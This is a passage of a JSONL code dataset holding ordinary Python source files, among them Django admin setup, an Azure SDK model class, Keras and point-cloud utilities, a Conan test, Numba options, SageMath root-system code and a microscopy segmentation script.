deviance\\t%s\" % (null_deviance), file=fout)\n\nprint(\"Residual deviance\\t%s\" % (residual_deviance), file=fout)\nprint(\"pseudo R-squared\\t%s\" % (rsq), file=fout)\nprint(\"\\n\", file=fout)\nprint(\"vif\", file=fout)\n\nif novif == 0:\n # py_vif=vif.as_py()\n count = 0\n for i in sorted(vif.names):\n print(\"c\" + str(x_cols[count] + 1), str(vif.rx2(i)[0]), file=fout)\n count += 1\nelif novif == 1:\n print(\"vif can calculate only when model have more than 1 predictor\", file=fout)\n"} {"ext": "py", "sha": "1a3057b5508f146d4372d9bbb5ae1f72c305925b", "content": "from django.contrib import admin\nfrom .models import Listing\n\nclass ListingAdmin(admin.ModelAdmin):\n list_display = ('id', 'title', 'is_published', 'price', 'list_date', 'realtor')\n list_display_links = ('id', 'title')\n list_filter = ('realtor',)\n list_editable = ('is_published',)\n search_fields = ('title', 'description', 'address', 'city', 'zipcode', 'price')\n list_per_page = 25\n\n\nadmin.site.register(Listing, ListingAdmin)"} {"ext": "py", "sha": "1a3057e7bf1790f7a33ff516356a2149953eee24", "content": "# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass StorageAccountItem(Model):\n \"\"\"The storage account item containing storage account metadata.\n\n Variables are only populated by the server, and will be ignored when\n sending a request.\n\n :ivar id: Storage identifier.\n :vartype id: str\n :ivar resource_id: Storage account resource Id.\n :vartype resource_id: str\n :ivar attributes: The storage account management attributes.\n :vartype attributes: ~azure.keyvault.models.StorageAccountAttributes\n :ivar tags: Application specific metadata in the form of key-value pairs.\n :vartype tags: dict[str, str]\n \"\"\"\n\n _validation = {\n 'id': {'readonly': True},\n 'resource_id': {'readonly': True},\n 'attributes': {'readonly': True},\n 'tags': {'readonly': True},\n }\n\n _attribute_map = {\n 'id': {'key': 'id', 'type': 'str'},\n 'resource_id': {'key': 'resourceId', 'type': 'str'},\n 'attributes': {'key': 'attributes', 'type': 'StorageAccountAttributes'},\n 'tags': {'key': 'tags', 'type': '{str}'},\n }\n\n def __init__(self, **kwargs):\n super(StorageAccountItem, self).__init__(**kwargs)\n self.id = None\n self.resource_id = None\n self.attributes = None\n self.tags = None\n"} {"ext": "py", "sha": "1a30587df351cc55b048aef37b79c75f822eba8a", "content": "#!/usr/bin/python3\n\n\"\"\"\nCopyright 2018-2019 Firmin.Sun (fmsunyh@gmail.com)\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n# -----------------------------------------------------\n# @Time : 11/8/2018 4:54 PM\n# @Author : Firmin.Sun (fmsunyh@gmail.com)\n# @Software: ZJ_AI\n# -----------------------------------------------------\n# -*- coding: utf-8 -*-\nimport keras\nimport numpy as np\nimport cv2\nfrom PIL import Image\n\ndef read_image_bgr(path):\n '''\n :param path:\n :return: (h, w, 3)\n '''\n try:\n image = np.asarray(Image.open(path).convert('RGB'))\n except Exception as ex:\n print(path)\n\n return image[:, :, ::-1].copy()\n\ndef preprocess_image(x):\n # mostly identical to \"https://github.com/fchollet/keras/blob/master/keras/applications/imagenet_utils.py\"\n # except for converting RGB -> BGR since we assume BGR already\n x = x.astype(keras.backend.floatx())\n if keras.backend.image_data_format() == 'channels_first':\n if x.ndim == 3:\n x[0, :, :] -= 103.939\n x[1, :, :] -= 116.779\n x[2, :, :] -= 123.68\n else:\n x[:, 0, :, :] -= 103.939\n x[:, 1, :, :] -= 116.779\n x[:, 2, :, :] -= 123.68\n else:\n x[..., 0] -= 103.939\n x[..., 1] -= 116.779\n x[..., 2] -= 123.68\n\n return x\n\ndef resize_image(image, min_side=448, max_side=448):\n '''\n resize image to dsize\n :param img: input (h, w, 3) = (rows, cols, 3)\n :param size:\n :return: out (h, w, 3)\n '''\n (h, w, _) = image.shape\n\n scale = np.asarray((min_side, max_side),dtype=float) / 
np.asarray((h, w),dtype=float)\n\n # resize the image with the computed scale\n # cv2.resize(image, (w, h))\n img = cv2.resize(image, (min_side, max_side))\n\n return img, scale\n"} {"ext": "py", "sha": "1a3058ecaea4ad3eec37bbe8cab4192826efd69a", "content": "import os\nimport unittest\n\nimport pytest\nfrom nose.plugins.attrib import attr\n\nfrom conans.test.assets.multi_config import multi_config_files\nfrom conans.test.utils.tools import TestClient\n\n\n@attr(\"slow\")\n@pytest.mark.slow\n@pytest.mark.tool_cmake\nclass CMakeConfigsTest(unittest.TestCase):\n\n def test_test_package_configs(self):\n client = TestClient()\n name = \"Hello0\"\n files = multi_config_files(name, test=True)\n client.save(files, clean_first=True)\n\n client.run(\"create . user/testing\")\n self.assertIn(\"Hello Release Hello0\", client.out)\n self.assertIn(\"Hello Debug Hello0\", client.out)\n\n def test_cmake_multi(self):\n client = TestClient()\n\n deps = None\n for name in [\"Hello0\", \"Hello1\", \"Hello2\"]:\n files = multi_config_files(name, test=False, deps=deps)\n client.save(files, clean_first=True)\n deps = [name]\n if name != \"Hello2\":\n client.run(\"export . lasote/stable\")\n\n client.run('install . --build missing')\n client.run(\"build .\")\n cmd = os.sep.join([\".\", \"bin\", \"say_hello\"])\n client.run_command(cmd)\n self.assertIn(\"Hello Release Hello2 Hello Release Hello1 Hello Release Hello0\",\n \" \".join(str(client.out).splitlines()))\n client.run_command(cmd + \"_d\")\n self.assertIn(\"Hello Debug Hello2 Hello Debug Hello1 Hello Debug Hello0\",\n \" \".join(str(client.out).splitlines()))\n"} {"ext": "py", "sha": "1a3058fb23ba11df9eb6228e028a03afc4ae99c2", "content": "\"\"\"\nDefines CPU Options for use in the CPU target\n\"\"\"\n\n\nclass FastMathOptions(object):\n \"\"\"\n Options for controlling fast math optimization.\n \"\"\"\n\n def __init__(self, value):\n # https://releases.llvm.org/7.0.0/docs/LangRef.html#fast-math-flags\n valid_flags = {\n 'fast',\n 'nnan', 'ninf', 'nsz', 'arcp',\n 'contract', 'afn', 'reassoc',\n }\n\n if isinstance(value, FastMathOptions):\n self.flags = value.flags.copy()\n elif value is True:\n self.flags = {'fast'}\n elif value is False:\n self.flags = set()\n elif isinstance(value, set):\n invalid = value - valid_flags\n if invalid:\n raise ValueError(\"Unrecognized fastmath flags: %s\" % invalid)\n self.flags = value\n elif isinstance(value, dict):\n invalid = set(value.keys()) - valid_flags\n if invalid:\n raise ValueError(\"Unrecognized fastmath flags: %s\" % invalid)\n self.flags = {v for v, enable in value.items() if enable}\n else:\n msg = \"Expected fastmath option(s) to be either a bool, dict or set\"\n raise ValueError(msg)\n\n def __bool__(self):\n return bool(self.flags)\n\n __nonzero__ = __bool__\n\n def __repr__(self):\n return f\"FastMathOptions({self.flags})\"\n\n\nclass ParallelOptions(object):\n \"\"\"\n Options for controlling auto parallelization.\n \"\"\"\n\n def __init__(self, value):\n if isinstance(value, bool):\n self.enabled = value\n self.comprehension = value\n self.reduction = value\n self.inplace_binop = value\n self.setitem = value\n self.numpy = value\n self.stencil = value\n self.fusion = value\n self.prange = value\n elif isinstance(value, dict):\n self.enabled = True\n self.comprehension = value.pop('comprehension', True)\n self.reduction = value.pop('reduction', True)\n self.inplace_binop = value.pop('inplace_binop', True)\n self.setitem = value.pop('setitem', True)\n self.numpy = value.pop('numpy', True)\n self.stencil 
= value.pop('stencil', True)\n self.fusion = value.pop('fusion', True)\n self.prange = value.pop('prange', True)\n if value:\n msg = \"Unrecognized parallel options: %s\" % value.keys()\n raise NameError(msg)\n elif isinstance(value, ParallelOptions):\n self.enabled = value.enabled\n self.comprehension = value.comprehension\n self.reduction = value.reduction\n self.inplace_binop = value.inplace_binop\n self.setitem = value.setitem\n self.numpy = value.numpy\n self.stencil = value.stencil\n self.fusion = value.fusion\n self.prange = value.prange\n else:\n msg = \"Expect parallel option to be either a bool or a dict\"\n raise ValueError(msg)\n\n\nclass InlineOptions(object):\n \"\"\"\n Options for controlling inlining\n \"\"\"\n\n def __init__(self, value):\n ok = False\n if isinstance(value, str):\n if value in ('always', 'never'):\n ok = True\n else:\n ok = hasattr(value, '__call__')\n\n if ok:\n self._inline = value\n else:\n msg = (\"kwarg 'inline' must be one of the strings 'always' or \"\n \"'never', or it can be a callable that returns True/False. \"\n \"Found value %s\" % value)\n raise ValueError(msg)\n\n @property\n def is_never_inline(self):\n \"\"\"\n True if never inline\n \"\"\"\n return self._inline == 'never'\n\n @property\n def is_always_inline(self):\n \"\"\"\n True if always inline\n \"\"\"\n return self._inline == 'always'\n\n @property\n def has_cost_model(self):\n \"\"\"\n True if a cost model is provided\n \"\"\"\n return not (self.is_always_inline or self.is_never_inline)\n\n @property\n def value(self):\n \"\"\"\n The raw value\n \"\"\"\n return self._inline\n"} {"ext": "py", "sha": "1a305a69c89f7036862c6e0ab50cc0e0a291f95e", "content": "import math\nimport numpy as np\nimport torch\nfrom scipy.spatial import cKDTree\n\n\ndef setup_seed(seed):\n torch.backends.cudnn.deterministic = True\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n\n\ndef square_dists(points1, points2):\n '''\n Calculate square dists between two group points\n :param points1: shape=(B, N, C)\n :param points2: shape=(B, M, C)\n :return:\n '''\n B, N, C = points1.shape\n _, M, _ = points2.shape\n dists = torch.sum(torch.pow(points1, 2), dim=-1).view(B, N, 1) + \\\n torch.sum(torch.pow(points2, 2), dim=-1).view(B, 1, M)\n dists -= 2 * torch.matmul(points1, points2.permute(0, 2, 1))\n #dists = torch.where(dists < 0, torch.ones_like(dists) * 1e-7, dists) # Very Important for dist = 0.\n return dists.float()\n\n\ndef random_select_points(pc, m):\n if m < 0:\n idx = np.arange(pc.shape[0])\n np.random.shuffle(idx)\n return pc[idx, :]\n n = pc.shape[0]\n replace = False if n >= m else True\n idx = np.random.choice(n, size=(m, ), replace=replace)\n return pc[idx, :]\n\n\ndef generate_rotation_x_matrix(theta):\n mat = np.eye(3, dtype=np.float32)\n mat[1, 1] = math.cos(theta)\n mat[1, 2] = -math.sin(theta)\n mat[2, 1] = math.sin(theta)\n mat[2, 2] = math.cos(theta)\n return mat\n\n\ndef generate_rotation_y_matrix(theta):\n mat = np.eye(3, dtype=np.float32)\n mat[0, 0] = math.cos(theta)\n mat[0, 2] = math.sin(theta)\n mat[2, 0] = -math.sin(theta)\n mat[2, 2] = math.cos(theta)\n return mat\n\n\ndef generate_rotation_z_matrix(theta):\n mat = np.eye(3, dtype=np.float32)\n mat[0, 0] = math.cos(theta)\n mat[0, 1] = -math.sin(theta)\n mat[1, 0] = math.sin(theta)\n mat[1, 1] = math.cos(theta)\n return mat\n\n\ndef generate_random_rotation_matrix(angle1=-45, angle2=45):\n thetax = np.random.uniform() * np.pi * angle2 / 180.0\n thetay = np.random.uniform() * np.pi * angle2 / 180.0\n 
thetaz = np.random.uniform() * np.pi * angle2 / 180.0\n matx = generate_rotation_x_matrix(thetax)\n maty = generate_rotation_y_matrix(thetay)\n matz = generate_rotation_z_matrix(thetaz)\n return np.dot(matx, np.dot(maty, matz))\n\n\ndef generate_random_tranlation_vector(range1=-0.5, range2=0.5):\n tranlation_vector = np.random.uniform(range1, range2, size=(3, )).astype(np.float32)\n return tranlation_vector\n\n\ndef transform(pc, R, t=None):\n pc = np.dot(pc, R.T)\n if t is not None:\n pc = pc + t\n return pc\n\n\ndef batch_transform(batch_pc, batch_R, batch_t=None):\n '''\n\n :param batch_pc: shape=(B, N, 3)\n :param batch_R: shape=(B, 3, 3)\n :param batch_t: shape=(B, 3)\n :return: shape(B, N, 3)\n '''\n transformed_pc = torch.matmul(batch_pc, batch_R.permute(0, 2, 1).contiguous())\n if batch_t is not None:\n transformed_pc = transformed_pc + torch.unsqueeze(batch_t, 1)\n return transformed_pc\n\n\n# The transformation between unit quaternion and rotation matrix is referenced to\n# https://zhuanlan.zhihu.com/p/45404840\n\ndef quat2mat(quat):\n w, x, y, z = quat\n R = np.zeros((3, 3), dtype=np.float32)\n R[0][0] = 1 - 2*y*y - 2*z*z\n R[0][1] = 2*x*y - 2*z*w\n R[0][2] = 2*x*z + 2*y*w\n R[1][0] = 2*x*y + 2*z*w\n R[1][1] = 1 - 2*x*x - 2*z*z\n R[1][2] = 2*y*z - 2*x*w\n R[2][0] = 2*x*z - 2*y*w\n R[2][1] = 2*y*z + 2*x*w\n R[2][2] = 1 - 2*x*x - 2*y*y\n return R\n\n\ndef batch_quat2mat(batch_quat):\n '''\n\n :param batch_quat: shape=(B, 4)\n :return:\n '''\n w, x, y, z = batch_quat[:, 0], batch_quat[:, 1], batch_quat[:, 2], \\\n batch_quat[:, 3]\n device = batch_quat.device\n B = batch_quat.size()[0]\n R = torch.zeros(dtype=torch.float, size=(B, 3, 3)).to(device)\n R[:, 0, 0] = 1 - 2 * y * y - 2 * z * z\n R[:, 0, 1] = 2 * x * y - 2 * z * w\n R[:, 0, 2] = 2 * x * z + 2 * y * w\n R[:, 1, 0] = 2 * x * y + 2 * z * w\n R[:, 1, 1] = 1 - 2 * x * x - 2 * z * z\n R[:, 1, 2] = 2 * y * z - 2 * x * w\n R[:, 2, 0] = 2 * x * z - 2 * y * w\n R[:, 2, 1] = 2 * y * z + 2 * x * w\n R[:, 2, 2] = 1 - 2 * x * x - 2 * y * y\n return R\n\n\ndef mat2quat(mat):\n w = math.sqrt(mat[0, 0] + mat[1, 1] + mat[2, 2] + 1 + 1e-8) / 2\n x = (mat[2, 1] - mat[1, 2]) / (4 * w + 1e-8)\n y = (mat[0, 2] - mat[2, 0]) / (4 * w + 1e-8)\n z = (mat[1, 0] - mat[0, 1]) / (4 * w + 1e-8)\n return w, x, y, z\n\n\ndef jitter_point_cloud(pc, sigma=0.01, clip=0.05):\n N, C = pc.shape\n assert(clip > 0)\n #jittered_data = np.clip(sigma * np.random.randn(N, C), -1*clip, clip).astype(np.float32)\n jittered_data = np.clip(\n np.random.normal(0.0, scale=sigma, size=(N, 3)),\n -1 * clip, clip).astype(np.float32)\n jittered_data += pc\n return jittered_data\n\n\ndef shift_point_cloud(pc, shift_range=0.1):\n N, C = pc.shape\n shifts = np.random.uniform(-shift_range, shift_range, (1, C)).astype(np.float32)\n pc += shifts\n return pc\n\n\ndef random_scale_point_cloud(pc, scale_low=0.8, scale_high=1.25):\n scale = np.random.uniform(scale_low, scale_high, 1)\n pc *= scale\n return pc\n\n\ndef inv_R_t(R, t):\n inv_R = R.permute(0, 2, 1).contiguous()\n inv_t = - inv_R @ t[..., None]\n return inv_R, torch.squeeze(inv_t, -1)\n\n\ndef uniform_2_sphere(num: int = None):\n \"\"\"Uniform sampling on a 2-sphere\n\n Source: https://gist.github.com/andrewbolster/10274979\n\n Args:\n num: Number of vectors to sample (or None if single)\n\n Returns:\n Random Vector (np.ndarray) of size (num, 3) with norm 1.\n If num is None returned value will have size (3,)\n\n \"\"\"\n if num is not None:\n phi = np.random.uniform(0.0, 2 * np.pi, num)\n cos_theta = np.random.uniform(-1.0, 
1.0, num)\n else:\n phi = np.random.uniform(0.0, 2 * np.pi)\n cos_theta = np.random.uniform(-1.0, 1.0)\n\n theta = np.arccos(cos_theta)\n x = np.sin(theta) * np.cos(phi)\n y = np.sin(theta) * np.sin(phi)\n z = np.cos(theta)\n return np.stack((x, y, z), axis=-1)\n\n\ndef random_crop(pc, p_keep):\n rand_xyz = uniform_2_sphere()\n centroid = np.mean(pc[:, :3], axis=0)\n pc_centered = pc[:, :3] - centroid\n\n dist_from_plane = np.dot(pc_centered, rand_xyz)\n mask = dist_from_plane > np.percentile(dist_from_plane, (1.0 - p_keep) * 100)\n return pc[mask, :]\n\n\ndef shuffle_pc(pc):\n return np.random.permutation(pc)\n\n\ndef flip_pc(pc, r=0.5):\n if np.random.random() > r:\n pc[:, 1] = -1 * pc[:, 1]\n return pc\n\n\ndef angle(v1: torch.Tensor, v2: torch.Tensor):\n \"\"\"Compute angle between 2 vectors\n\n For robustness, we use the same formulation as in PPFNet, i.e.\n angle(v1, v2) = atan2(cross(v1, v2), dot(v1, v2)).\n This handles the case where one of the vectors is 0.0, since torch.atan2(0.0, 0.0)=0.0\n\n Args:\n v1: (B, *, 3)\n v2: (B, *, 3)\n\n Returns:\n\n \"\"\"\n\n cross_prod = torch.stack([v1[..., 1] * v2[..., 2] - v1[..., 2] * v2[..., 1],\n v1[..., 2] * v2[..., 0] - v1[..., 0] * v2[..., 2],\n v1[..., 0] * v2[..., 1] - v1[..., 1] * v2[..., 0]], dim=-1)\n cross_prod_norm = torch.norm(cross_prod, dim=-1)\n dot_prod = torch.sum(v1 * v2, dim=-1)\n\n return torch.atan2(cross_prod_norm, dot_prod)\n"} {"ext": "py", "sha": "1a305d3908c23751a396191f4d9795628afa0074", "content": "\"\"\"\nRoot system data for type G\n\"\"\"\n#*****************************************************************************\n# Copyright (C) 2008-2009 Daniel Bump\n# Copyright (C) 2008-2009 Justin Walker\n# Copyright (C) 2008-2013 Nicolas M. Thiery \n#\n# Distributed under the terms of the GNU General Public License (GPL)\n# http://www.gnu.org/licenses/\n#*****************************************************************************\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nfrom . import ambient_space\nfrom sage.sets.family import Family\nfrom sage.combinat.root_system.root_lattice_realizations import RootLatticeRealizations\nclass AmbientSpace(ambient_space.AmbientSpace):\n \"\"\"\n EXAMPLES::\n\n sage: e = RootSystem(['G',2]).ambient_space(); e\n Ambient space of the Root system of type ['G', 2]\n\n One can not construct the ambient lattice because the simple\n coroots have rational coefficients::\n\n sage: e.simple_coroots()\n Finite family {1: (0, 1, -1), 2: (1/3, -2/3, 1/3)}\n sage: e.smallest_base_ring()\n Rational Field\n\n By default, this ambient space uses the barycentric projection for plotting::\n\n sage: L = RootSystem([\"G\",2]).ambient_space()\n sage: e = L.basis()\n sage: L._plot_projection(e[0])\n (1/2, 989/1142)\n sage: L._plot_projection(e[1])\n (-1, 0)\n sage: L._plot_projection(e[2])\n (1/2, -989/1142)\n sage: L = RootSystem([\"A\",3]).ambient_space()\n sage: l = L.an_element(); l\n (2, 2, 3, 0)\n sage: L._plot_projection(l)\n (0, -1121/1189, 7/3)\n\n .. 
SEEALSO::\n\n - :meth:`sage.combinat.root_system.root_lattice_realizations.RootLatticeRealizations.ParentMethods._plot_projection`\n\n TESTS::\n\n sage: TestSuite(e).run()\n sage: [WeylDim(['G',2],[a,b]) for a,b in [[0,0], [1,0], [0,1], [1,1]]] # indirect doctest\n [1, 7, 14, 64]\n \"\"\"\n def dimension(self):\n \"\"\"\n EXAMPLES::\n\n sage: e = RootSystem(['G',2]).ambient_space()\n sage: e.dimension()\n 3\n \"\"\"\n return 3\n\n def simple_root(self, i):\n \"\"\"\n EXAMPLES::\n\n sage: CartanType(['G',2]).root_system().ambient_space().simple_roots()\n Finite family {1: (0, 1, -1), 2: (1, -2, 1)}\n \"\"\"\n return self.monomial(1)-self.monomial(2) if i == 1 else self.monomial(0)-2*self.monomial(1)+self.monomial(2)\n def positive_roots(self):\n \"\"\"\n EXAMPLES::\n\n sage: CartanType(['G',2]).root_system().ambient_space().positive_roots()\n [(0, 1, -1), (1, -2, 1), (1, -1, 0), (1, 0, -1), (1, 1, -2), (2, -1, -1)]\n \"\"\"\n return [ self(v) for v in\n [[0,1,-1],[1,-2,1],[1,-1,0],[1,0,-1],[1,1,-2],[2,-1,-1]]]\n\n def negative_roots(self):\n \"\"\"\n EXAMPLES::\n\n sage: CartanType(['G',2]).root_system().ambient_space().negative_roots()\n [(0, -1, 1), (-1, 2, -1), (-1, 1, 0), (-1, 0, 1), (-1, -1, 2), (-2, 1, 1)]\n \"\"\"\n return [ self(v) for v in\n [[0,-1,1],[-1,2,-1],[-1,1,0],[-1,0,1],[-1,-1,2],[-2,1,1]]]\n\n def fundamental_weights(self):\n \"\"\"\n EXAMPLES::\n\n sage: CartanType(['G',2]).root_system().ambient_space().fundamental_weights()\n Finite family {1: (1, 0, -1), 2: (2, -1, -1)}\n \"\"\"\n return Family({ 1: self([1,0,-1]),\n 2: self([2,-1,-1])})\n\n _plot_projection = RootLatticeRealizations.ParentMethods.__dict__['_plot_projection_barycentric']\n\n\nfrom .cartan_type import CartanType_standard_finite, CartanType_simple, CartanType_crystallographic\nclass CartanType(CartanType_standard_finite, CartanType_simple, CartanType_crystallographic):\n def __init__(self):\n \"\"\"\n EXAMPLES::\n\n sage: ct = CartanType(['G',2])\n sage: ct\n ['G', 2]\n sage: ct._repr_(compact = True)\n 'G2'\n\n sage: ct.is_irreducible()\n True\n sage: ct.is_finite()\n True\n sage: ct.is_crystallographic()\n True\n sage: ct.is_simply_laced()\n False\n sage: ct.dual()\n ['G', 2] relabelled by {1: 2, 2: 1}\n sage: ct.affine()\n ['G', 2, 1]\n\n TESTS::\n\n sage: TestSuite(ct).run()\n \"\"\"\n CartanType_standard_finite.__init__(self, \"G\", 2)\n\n def _latex_(self):\n r\"\"\"\n Return a latex representation of ``self``.\n\n EXAMPLES::\n\n sage: latex(CartanType(['G',2]))\n G_2\n sage: latex(CartanType(['G',2]).dual())\n G_2 \\text{ relabelled by } \\left\\{1 : 2, 2 : 1\\right\\}\n \"\"\"\n return \"G_2\"\n\n AmbientSpace = AmbientSpace\n\n def coxeter_number(self):\n \"\"\"\n Return the Coxeter number associated with ``self``.\n\n EXAMPLES::\n\n sage: CartanType(['G',2]).coxeter_number()\n 6\n \"\"\"\n return 6\n\n def dual_coxeter_number(self):\n \"\"\"\n Return the dual Coxeter number associated with ``self``.\n\n EXAMPLES::\n\n sage: CartanType(['G',2]).dual_coxeter_number()\n 4\n \"\"\"\n return 4\n\n def dynkin_diagram(self):\n \"\"\"\n Returns a Dynkin diagram for type G.\n\n EXAMPLES::\n\n sage: g = CartanType(['G',2]).dynkin_diagram()\n sage: g\n 3\n O=<=O\n 1 2\n G2\n sage: sorted(g.edges())\n [(1, 2, 1), (2, 1, 3)]\n \"\"\"\n from .dynkin_diagram import DynkinDiagram_class\n g = DynkinDiagram_class(self)\n g.add_edge(1,2)\n g.set_edge_label(2,1,3)\n return g\n\n def _latex_dynkin_diagram(self, label=lambda i: i, node=None, node_dist=2, dual=False):\n r\"\"\"\n Return a latex representation of the 
Dynkin diagram.\n\n EXAMPLES::\n\n sage: print(CartanType(['G',2])._latex_dynkin_diagram())\n \\draw (0,0) -- (2 cm,0);\n \\draw (0, 0.15 cm) -- +(2 cm,0);\n \\draw (0, -0.15 cm) -- +(2 cm,0);\n \\draw[shift={(0.8, 0)}, rotate=180] (135 : 0.45cm) -- (0,0) -- (-135 : 0.45cm);\n \\draw[fill=white] (0 cm, 0 cm) circle (.25cm) node[below=4pt]{$1$};\n \\draw[fill=white] (2 cm, 0 cm) circle (.25cm) node[below=4pt]{$2$};\n \n \"\"\"\n if node is None:\n node = self._latex_draw_node\n ret = \"\\\\draw (0,0) -- (%s cm,0);\\n\"%node_dist\n ret += \"\\\\draw (0, 0.15 cm) -- +(%s cm,0);\\n\"%node_dist\n ret += \"\\\\draw (0, -0.15 cm) -- +(%s cm,0);\\n\"%node_dist\n if dual:\n ret += self._latex_draw_arrow_tip(0.5*node_dist+0.2, 0, 0)\n else:\n ret += self._latex_draw_arrow_tip(0.5*node_dist-0.2, 0, 180)\n ret += node(0, 0, label(1))\n ret += node(node_dist, 0, label(2))\n return ret\n\n def ascii_art(self, label=lambda i: i, node=None):\n \"\"\"\n Return an ascii art representation of the Dynkin diagram.\n\n EXAMPLES::\n\n sage: print(CartanType(['G',2]).ascii_art(label=lambda x: x+2))\n 3\n O=<=O\n 3 4\n \"\"\"\n if node is None:\n node = self._ascii_art_node\n ret = \" 3\\n{}=<={}\\n\".format(node(label(1)), node(label(2)))\n return ret + \"{!s:4}{!s:4}\".format(label(1), label(2))\n\n def dual(self):\n r\"\"\"\n Return the dual Cartan type.\n\n This uses that `G_2` is self-dual up to relabelling.\n\n EXAMPLES::\n\n sage: G2 = CartanType(['G',2])\n sage: G2.dual()\n ['G', 2] relabelled by {1: 2, 2: 1}\n\n sage: G2.dynkin_diagram()\n 3\n O=<=O\n 1 2\n G2\n sage: G2.dual().dynkin_diagram()\n 3\n O=<=O\n 2 1\n G2 relabelled by {1: 2, 2: 1}\n \"\"\"\n return self.relabel({1:2, 2:1})\n\n def _default_folded_cartan_type(self):\n \"\"\"\n Return the default folded Cartan type.\n\n EXAMPLES::\n\n sage: CartanType(['G', 2])._default_folded_cartan_type()\n ['G', 2] as a folding of ['D', 4]\n \"\"\"\n from sage.combinat.root_system.type_folded import CartanTypeFolded\n return CartanTypeFolded(self, ['D', 4], [[1, 3, 4], [2]])\n\n# For unpickling backward compatibility (Sage <= 4.1)\nfrom sage.structure.sage_object import register_unpickle_override\nregister_unpickle_override('sage.combinat.root_system.type_G', 'ambient_space', AmbientSpace)\n"} {"ext": "py", "sha": "1a305d494478a6d7d10a37d8e5ef279e975879cb", "content": "import os\nimport glob\n\n# Our numerical workhorses\nimport numpy as np\nimport pandas as pd\nimport scipy.special\n\n# Import the project utils\nimport sys\nsys.path.insert(0, '../')\nimport image_analysis_utils as im_utils\n\n# Useful plotting libraries\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport matplotlib as mpl\nimport seaborn as sns\n\n# Image analysis libraries\nimport skimage.io\nimport skimage.filters\nimport skimage.segmentation\nimport scipy.ndimage\n\n# Set plotting style\nim_utils.set_plotting_style()\n\n#============================================================================== \n# METADATA\n#============================================================================== \n\nDATE = 20161118\nUSERNAME = 'mrazomej'\nOPERATOR = 'O2'\nBINDING_ENERGY = -13.9\nREPRESSORS = (0, 0, 130)\nIPDIST = 0.160 # in units of µm per pixel\nSTRAINS = ['auto', 'delta', 'RBS1027']\nIPTG_RANGE = (0, 0.1, 5, 10, 25, 50, 75, 100, 250, 500, 1000, 5000)\n\n#============================================================================== \n\n# Define the data directory.\ndata_dir = '../../../data/microscopy/' + str(DATE) + '/'\n\n# Glob the profile and noise images.\nyfp_glob = 
glob.glob(data_dir + '*yfp_profile*/*.tif')\nrfp_glob = glob.glob(data_dir + '*mCherry_profile*/*.tif')\nnoise_glob = glob.glob(data_dir + '*noise*/*.tif')\n\n# Load the images as collections\nyfp_profile = skimage.io.ImageCollection(yfp_glob)\nrfp_profile = skimage.io.ImageCollection(rfp_glob)\nnoise_profile = skimage.io.ImageCollection(noise_glob)\n\n# Need to split the noise profile image into the two channels\nnoise_rfp = [noise_profile[i][0] for i, _ in enumerate(noise_profile)]\nnoise_yfp = [noise_profile[i][1] for i, _ in enumerate(noise_profile)]\n\n# Generate averages and plot them. \nrfp_avg = im_utils.average_stack(rfp_profile)\nyfp_avg = im_utils.average_stack(yfp_profile)\n\nrfp_noise = im_utils.average_stack(noise_rfp)\nyfp_noise = im_utils.average_stack(noise_yfp)\n\nwith sns.axes_style('white'):\n fig, ax = plt.subplots(2, 2, figsize=(6,6))\n ax = ax.ravel()\n ax[0].imshow(yfp_avg, cmap=plt.cm.viridis)\n ax[0].set_title('yfp profile')\n ax[1].imshow(rfp_avg, cmap=plt.cm.plasma)\n ax[1].set_title('rfp profile')\n ax[2].imshow(yfp_noise, cmap=plt.cm.Greens_r)\n ax[2].set_title('yfp noise')\n ax[3].imshow(rfp_noise, cmap=plt.cm.Reds_r)\n ax[3].set_title('rfp noise')\nplt.tight_layout()\nplt.savefig('./outdir/background_correction.png')\n\n#============================================================================== \n\n# Iterate through each strain and concentration to make the dataframes.\ndfs = []\n\n# Select random IPTG and random strain to print the example segmentation\nex_iptg = np.random.choice(IPTG_RANGE)\nex_strain = STRAINS[-1]\n\nfor i, st in enumerate(STRAINS):\n print(st)\n for j, iptg in enumerate(IPTG_RANGE):\n # Load the images\n if (iptg==0) & (st != STRAINS[-1]):\n images = glob.glob(data_dir + '*' + st + '_*/*.tif')\n \n else:\n images = glob.glob(data_dir + '*' + st + '*_' + str(iptg) +\n 'uMIPTG*/*.ome.tif')\n \n if len(images) is not 0:\n ims = skimage.io.ImageCollection(images)\n # Select random image to print example segmentation\n ex_no = np.random.choice(np.arange(0, len(images) - 1)) \n \n for z, x in enumerate(ims):\n _, m, y = im_utils.ome_split(x)\n y_flat = im_utils.generate_flatfield(y, yfp_noise, yfp_avg)\n \n # Segment the mCherry channel.\n m_seg = im_utils.log_segmentation(m, label=True)\n\n # Print example segmentation for the random image\n if (st==ex_strain) & (iptg == ex_iptg) & (z == ex_no):\n merge = im_utils.example_segmentation(m_seg, _, 10/IPDIST)\n skimage.io.imsave('./outdir/example_segmentation.png', merge)\n\n # Extract the measurements.\n im_df = im_utils.props_to_df(m_seg, physical_distance=IPDIST,\n intensity_image=y_flat)\n \n # Add strain and IPTG concentration information.\n im_df.insert(0, 'IPTG_uM', iptg)\n im_df.insert(0, 'repressors', REPRESSORS[i])\n im_df.insert(0, 'rbs', st)\n im_df.insert(0, 'binding_energy', BINDING_ENERGY)\n im_df.insert(0, 'operator', OPERATOR)\n im_df.insert(0, 'username', USERNAME)\n im_df.insert(0, 'date', DATE)\n \n # Append the dataframe to the global list.\n dfs.append(im_df)\n\n# Concatenate the dataframe\ndf_im = pd.concat(dfs, axis=0)\ndf_im.to_csv('./outdir/' + str(DATE) + '_' + OPERATOR + '_' +\\\n STRAINS[-1] + '_raw_segmentation.csv', index=False)\n\n"} {"ext": "py", "sha": "1a305d589fd99a0bec3c4029563e5f8162b0535a", "content": 